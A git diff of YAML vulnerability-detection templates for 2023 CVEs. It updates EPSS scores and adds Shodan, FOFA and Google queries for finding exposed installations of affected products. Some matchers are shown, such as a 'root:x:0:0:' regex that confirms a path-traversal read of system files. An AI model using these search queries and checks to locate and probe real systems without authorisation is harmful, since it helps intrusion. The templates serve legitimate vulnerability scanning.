digest: 490a0046304402202751986b59332bc745de2c5c701823724a9ee6e91513a29689d5429469c723de022061e634ed487b4f3c4e3fb10ff500c82c0aa5c676d3e55638270d13781455afa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index ccc2641897..4a75ed5211 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3848 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61873 + epss-score: 0.00235 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooDating")' condition: and -# digest: 4a0a00473045022100df789f78e15433e066ac366cd45fb0ab831dd27ec3327f322386fd167783fccf02207493d5c8e7275ba99d828a68c7bd4ce44c79b42867630faba0abc7e1b065b1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097be91084c3b6a75bcb35a7556fc7e09a909c5f07593800517da311c75b405a2022027c964fd5f65c5f28663417791ae7f162b89013265851f983a494cefa9fa1322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index 6e04c0a610..b1376febf8 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3849 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61873 + epss-score: 0.00235 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">s9a64") && contains(body, "mooDating")' condition: and -# digest: 4a0a00473045022100eb8f361af200c602790d9ee669037a9794849480b4fd8c4985e9f9c24aea7a6a022029d23bdd9a0f5f73cbd8fde5c3dbda1648d7da792d88eaef5d89545923d756e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100976a429a0acadd41d7c73ccebbad61db7e7f7563ef6437758f5b07076b5218a6022100ec673a999416f67a8f70ed78449316a200fc7f2bcd4c6745c66108efd3ce5ea9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 2ad005fee4..db600cfda4 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -18,15 +18,19 @@ info: cvss-score: 6.1 cve-id: CVE-2023-38501 cwe-id: CWE-79 - epss-score: 0.00271 - epss-percentile: 0.64421 + epss-score: 0.00198 + epss-percentile: 0.57252 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty - shodan-query: title:"copyparty" + shodan-query: + - title:"copyparty" + - http.title:"copyparty" + fofa-query: title="copyparty" + google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project http: @@ -41,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "","\">go to")' condition: and -# digest: 490a00463044022028c709bfbd562c3f69c41bbb66973f2958762095b47c242410025b3a2271b7e90220062ee86e230c48160df50455b3584210913128460f183bf14324eca1353a77e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015232a0b9a376e134d12be8765ea8490b2e4e80d4eeb2ce4eac537bbeecb9d87022100a4641d129669bde580ec4d925aaa2a60e36c23467fc951db62fe9a654113f8ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 0736c3b2bc..463c83f735 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -21,16 +21,22 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-38646 - epss-score: 0.62661 - epss-percentile: 0.97553 + epss-score: 0.91302 + epss-percentile: 0.98865 cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* metadata: verified: true max-request: 2 vendor: metabase product: metabase - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" + shodan-query: + - http.title:"Metabase" + - http.title:"metabase" + fofa-query: + - app="Metabase" + - title="metabase" + - app="metabase" + google-query: intitle:"metabase" tags: cve2023,cve,metabase,oss,rce variables: file: "./plugins/vertica.metabase-driver.jar" @@ -72,4 +78,4 @@ http: - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException") - status_code_2 == 400 condition: and -# digest: 4a0a0047304502203102c0be553270c1adbdbabe997bbaea6e3adaf6c2c1e46a703305f68834c2cc02210094818702b8fab66d0d303cf006c3a5a3a12f0140323564cfd177e55e21325a0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220430d6b3809d41f95f3490cfd06e099f7baa5b88b22f600e3333d56ac068d9b3502207e61d04694ef23ed0a6d7fec22487a8274ad68b76a2503eb1b785722c6355e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index 17331d3e27..b8398091ad 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -18,15 +18,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-38964 cwe-id: CWE-79 - epss-score: 0.00046 - epss-percentile: 0.15636 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: creativeitem product: academy_lms - fofa-query: body="Academy LMS" + shodan-query: http.html:"academy lms" + fofa-query: + - body="Academy LMS" + - body="academy lms" tags: cve2023,cve,academylms,xss,creativeitem http: @@ -42,4 +45,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "All courses")' condition: and -# digest: 490a004630440220588a1a20171ed9e63186819de5ce752cf21132d717d03d74100877a2037385cf022007fb5a6ec93b218fd213ed4c152c786d03f8e6aae0ec8e2eaee9177460c173e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e604c0ad2fcb45b147262455b08d0bf158d5cc71cabb5a521fd1cb050c959ff802204279a912eb299e0c11b5b2ab85bcfe0464dad43cda5f4b9ca6fa37f3d49b1be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 4df0a4e64e..41bd71963b 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -15,14 +15,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39002 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26117 + epss-score: 0.00071 + epss-percentile: 0.30401 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: opnsense product: opnsense - shodan-query: title:"OPNsense" + shodan-query: + - title:"OPNsense" + - http.title:"opnsense" + fofa-query: title="opnsense" + google-query: intitle:"opnsense" tags: cve2023,cve,opnsense,xss,authenticated,rce http: @@ -74,4 +78,4 @@ http: regex: - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="' internal: true -# digest: 4b0a00483046022100c9a7773d904e9fa5c973745a8ee5c0f73380b28f646d8f3ff079eafd3a063e7c022100f3fa44d5e64cf31c9b245337c65ffa6e69c59c68ba5b34ffc15408ed780def70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220648e359fb46c1d659f869a9bf80a9531bb4084585421f669e1718e685d5f6e25022100bcc807892e83e45f05bbf62bce39d41ac4e656c6f0d585f294b55a73de06771b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 2387e68505..211c8237da 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -21,16 +21,18 @@ info: cvss-score: 7.5 cve-id: CVE-2023-39026 cwe-id: CWE-22 - epss-score: 0.05678 - epss-percentile: 0.9256 - cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* + epss-score: 0.04279 + epss-percentile: 0.92285 + cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: filemage - product: filemage - shodan-query: title:"FileMage" - tags: cve2023,cve,packetstorm,lfi,filemage + vendor: microsoft + product: windows + shodan-query: + - title:"FileMage" + - cpe:"cpe:2.3:o:microsoft:windows" + tags: cve2023,cve,packetstorm,lfi,filemage,microsoft http: - method: GET @@ -44,4 +46,4 @@ http: - "contains(content_type, 'text/plain')" - "status_code == 200" condition: and -# digest: 4b0a00483046022100c8237ade5adc55459f68743aca2aa30e8aa8de98fcffff36262985d1038add45022100f003f17b5f16a43845084bc29f3bc6bbcc86845bb32e5df35fe9c65002dd2bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009395553313e58384aab722806070a0a43add2f31f397edc603d9ddc31c2ddaa802207c5c388fd3f079f0106064a1d8296a16c83f3c09259fe4710bc286dbbc9229a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 5641a014db..74cbd87913 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -10,20 +10,25 @@ info: - https://www.rconfig.com/downloads/rconfig-3.9.4.zip - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md - https://nvd.nist.gov/vuln/detail/CVE-2023-39108 + - https://github.com/zer0yu/CVE_Request classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-39108 cwe-id: CWE-918 - epss-score: 0.01332 - epss-percentile: 0.84573 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: @@ -59,4 +64,4 @@ http: part: header_3 status: - 200 -# digest: 4b0a0048304602210090ac3eea92e5a41afb2bb6cc79b850803be8d90654e131d3155f74826abc4ae8022100ad646f643e976f8f859ef1aef542e1d37db72aa3fa2a840a964ad510f756f881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092c250822bc140350abf1d8e73be7b64640b19c53c886108c94028d9c2b752a4022100faf855cae3dcd7b95133fafafb9ed2ff4a7762cd22f475c64b725d1753a256c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index c2b4f687cf..cae7409edd 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -16,15 +16,19 @@ info: cvss-score: 8.8 cve-id: CVE-2023-39109 cwe-id: CWE-918 - epss-score: 0.03449 - epss-percentile: 0.91267 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfi http: @@ -59,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3246be44ceef6ea2e435be5a11aae0e8e6a5b0bff8ff778f8541446b1566252022100c08b1259680e594668aebd2ebdd3e2bc2a1937bc404b59c4bc2b4c3bbb0747c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8377d9a04b49ba5b8bfde6a545f50fefec795648d643e03f93a06ca69e2161402200d1268c1929891a66e2dc218ad53540c5ec143ad5bbe0658d1b5ec4581194a2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index b624b4b962..1de88473d5 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -16,15 +16,19 @@ info: cvss-score: 8.8 cve-id: CVE-2023-39110 cwe-id: CWE-918 - epss-score: 0.03449 - epss-percentile: 0.91267 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: @@ -60,4 +64,4 @@ http: part: header_3 status: - 200 -# digest: 490a0046304402207f76db15bb398543e9501f63c4ad814bd902f8f8c51a8ee350506f79735e17ae02206fef9f11657871d39967978871c9fb85398198ed6f4078057df0ebbfdf85ea41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b995c3bb00f64484c428053660654fa05df0dd9f3c16b04413160b53bed44c2f022100e3592718a2bdf464ebf92342fccd00975a48abf271fcb839116f42d24336ae8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 2c2df7e7b4..6051ad0bbe 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -14,20 +14,26 @@ info: - https://twitter.com/win3zz/status/1694239332465520684 - https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e - https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10 + - https://github.com/codeb0ss/CVE-2023-39141-PoC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39141 cwe-id: CWE-22 - epss-score: 0.00437 - epss-percentile: 0.72033 + epss-score: 0.005 + epss-percentile: 0.76302 cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: ziahamza product: webui-aria2 - shodan-query: title:"Aria2 WebUI" + shodan-query: + - title:"Aria2 WebUI" + - http.title:"aria2 webui" + fofa-query: title="aria2 webui" + google-query: intitle:"aria2 webui" tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza http: @@ -42,4 +48,4 @@ http: - 'contains(body_1, "Aria2 WebUI")' - 'regex("root:x:0:0:",body_2)' condition: and -# digest: 4a0a0047304502210095b97a18980d901d900ac8182e8f6d76a5a2a67a7ee84484e85a9a171ec2970a02200bf1e08f9eb496e54ea1b42f07c0c06c2e2f7a83917c4b1b9a4d4ac9ca61b7ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a38d7e3d153b3ca9f265e415de91c44b4ad3fc85616857375dd7d2a497452520022065e6ee9c6a28f3f4532fb908c2729c6bebd94b235f44854b7ccd57a63c9bcbad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 62af18ad92..ef022f0128 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -20,15 +20,22 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39143 cwe-id: CWE-22 - epss-score: 0.93991 - epss-percentile: 0.99092 + epss-score: 0.95367 + epss-percentile: 0.9936 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: papercut product: papercut_mf - shodan-query: html:"content=\"PaperCut\"" + shodan-query: + - html:"content=\"PaperCut\"" + - http.html:"papercut" + - http.html:"content=\"papercut\"" + - cpe:"cpe:2.3:a:papercut:papercut_mf" + fofa-query: + - body="papercut" + - body="content=\"papercut\"" tags: cve2023,cve,lfi,papercut http: @@ -44,4 +51,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and -# digest: 4b0a00483046022100c6b50e3324b68352bd5bfe29633a9db388f1c831c218c8a4e23106a478bc6b7002210099ac0e1d64eae74b2664fccf7eff0e8c2cc9e5cd862c7b3e5abb81755c90e381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4b39621fcab1929272ab47121f4a4b867f1b56ea253efa9d279485bbb236063022100bfaa457890fb2327e090c027195d0101e3aa5236c5f7ffaadceb61282b17874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 4711e6a136..c36cdd4d6e 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3936 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26189 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2542c5b578aa1b6054c4391c618faf48d5a6721aa2a2c6f8f5282d057aaeb62022100f40e458db85ae7f25e9ceda5370d49473cb23b2dbd1db4b82625581ce539525a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a9cdd49e5fc62423b550121259ff1d80c849ab273f66ae6579dcfa7d245269d02206782a407244948dbae7962e67a7a5310a5503ad9a6f445a9f4d7813f0e3b3ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 46a1d44d1c..3ce5c7f525 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -19,15 +19,26 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39361 cwe-id: CWE-89 - epss-score: 0.13486 - epss-percentile: 0.95109 + epss-score: 0.233 + epss-percentile: 0.9655 cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cacti product: cacti - shodan-query: title:"Login to Cacti" + shodan-query: + - title:"Login to Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve2023,cve,cacti,sqli http: @@ -44,4 +55,4 @@ http: - 'status_code == 200' - 'contains_all(body, "Tree Mode", "cacti")' condition: and -# digest: 4b0a00483046022100c25eecdf587234017cf6b626efb9d75b33a6de8aa74f8c2fb47d7a9a88a1e6630221008ead6f563992b037d679640d1b38a8f29f1ba2082ec853cf4a27034c2a8595ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002af61baaf992b1167e9f2985b01c088d748134231a69f9fd3a5381851a758c402202527d2063c1039eefc8947a87236bf4cb6fcb0cccf8d8e5d6d1fe9346f0ef463:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 81eb0d53a8..06471cacf5 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -18,15 +18,19 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39598 cwe-id: CWE-79 - epss-score: 0.02804 - epss-percentile: 0.90411 + epss-score: 0.05054 + epss-percentile: 0.92885 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: icewarp product: webclient - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2023,cve,xss,icewarp http: @@ -50,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066fea1c991470ad12b0b6368cc977cb17842be9a515cfb209f347e80761a7fca02210099ca332958026e4c04ae258f60fead3e94e63aac0b964f658b9b0e0c795bce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b61cc4082f72e9770eabedfb6b301b7590959070f5bb1b6f14227b274ac82bc5022100c14f59d395c1494ad92a9ef23f1b51bb8547b853478e8dfbb4792b31ca0c0d2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index af6be74e1c..000ff0a8a9 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -18,14 +18,21 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39600 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26117 + epss-score: 0.00071 + epss-percentile: 0.30401 cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: icewarp - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.favicon.hash:2144485375 + - http.title:"icewarp" + fofa-query: + - title="icewarp" + - icon_hash=2144485375 + google-query: intitle:"icewarp" tags: cve,cve2023,icewarp,xss http: @@ -49,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200265cbcb6af05e61fad5c3086201ea2c320faf4a231352a2375f2f5b58537fd3022100bc56106b38fa09b709016bfe171871b601e72d08fdf0d3906c7d071c8fb2826a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220223da6b4cc7f2ee5e43255592d8c512cb4515155f974d5690551bb55b44b73fc02200baec7d7281c07eccf1b162ce42f9d46f68999c589f704af58c07bd958e679d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index cbcc8f15ce..a357493b36 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-39676 cwe-id: CWE-79 epss-score: 0.00167 - epss-percentile: 0.53357 + epss-percentile: 0.53401 cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: "true" @@ -26,7 +26,10 @@ info: vendor: fieldthemes product: fieldpopupnewsletter framework: prestashop - shodan-query: html:"fieldpopupnewsletter" + shodan-query: + - html:"fieldpopupnewsletter" + - http.html:"fieldpopupnewsletter" + fofa-query: body="fieldpopupnewsletter" tags: cve2023,cve,prestashop,xss,fieldthemes http: @@ -46,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045b80f7ecb911d219381e8f7789434632ff0c96af4db2c08ef74e4b32b7d9f0f022100f70379fd255ea20f6d6da9608fc81cf4423b55421650a9c5fc4dd3834df6845f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220615d5617cd97e41cd4640501b04b93e2a9119b4a562c416f9294b4b7589e1406022066f5701e58953a2266b8295e991d107419138bbd7edc9bfe3845d143f0df17be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index c39e47d90e..07d52b9b98 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39677 - epss-score: 0.00632 - epss-percentile: 0.76782 + epss-score: 0.00767 + epss-percentile: 0.81177 cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:* metadata: verified: true @@ -26,7 +26,9 @@ info: vendor: simpleimportproduct_project product: simpleimportproduct framework: prestashop - shodan-query: http.component:"PrestaShop" + shodan-query: + - http.component:"PrestaShop" + - http.component:"prestashop" tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project http: @@ -54,4 +56,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 4a0a004730450220433b7e31747bf747810caff412effad724e047b8f0cfdbf37de29f43da98fb3d022100f0a4df6bcc9fd476fe130c2cdf286da02199f192c93479f7d3acca35579d666c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be2fd9b723534f19814f60f7d477a325d41fe610a3a988fb532d5a822f51da0e022100a497a14901a48c93369699a523b8cff0405d5695047617009083552316d567b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index 212000700f..a63ea622d7 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -17,14 +17,25 @@ info: cve-id: CVE-2023-39700 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41615 + epss-percentile: 0.42039 cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: icewarp product: mail_server - shodan-query: http.title:"IceWarp Server Administration" + shodan-query: + - http.title:"IceWarp Server Administration" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve,cve2023,icewarp,xss,unauth http: @@ -40,4 +51,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, ">") && contains(body, "IceWarp")' condition: and -# digest: 4a0a0047304502203930c735d889ed16173497baf4f00e9422930afaef7984f350a34fa7a68289fb022100838b15182d9d030c464bc3252a19193f0ad318b5b23362ec78e0f5d8e58ad0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080543a209ab39db177f7068a1e48f1b1f0439fb77f185bd17c00975df65c142d022100e6a96d41521239a3c7404f5f4a76a26be03aa8db4332889f9950f405beee3557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 7992ca201b..3187e5044b 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39796 cwe-id: CWE-89 - epss-score: 0.03223 - epss-percentile: 0.90219 + epss-score: 0.05018 + epss-percentile: 0.92857 cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:* metadata: verified: true @@ -42,4 +42,4 @@ http: - 'status_code_1 == 200' - 'contains(body, "Record deleted successfully!")' condition: and -# digest: 4b0a004830460221009cfde4a69aa6b2b5742a2830be00f5359ecd9be30f15f6522fb80e4ed32429ce022100d8cc11c0878452a27fb9ab372e2f67fbccd3e8b9ca30079ae62e533abede4b71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc6387053a528f5da55af6a431c8e8a7256148c4be5ce8f6dc5db9b3b8974b1f022100c4d7d900752e413d2a79cff723d5e88bab601eade61c0ed12b050cf87dc10a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 6bcd5cd92a..a8bf286cc0 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-40208 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26209 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,9 @@ info: vendor: urosevic product: stock_ticker framework: wordpress + shodan-query: http.html:/wp-content/plugins/stock-ticker/ + 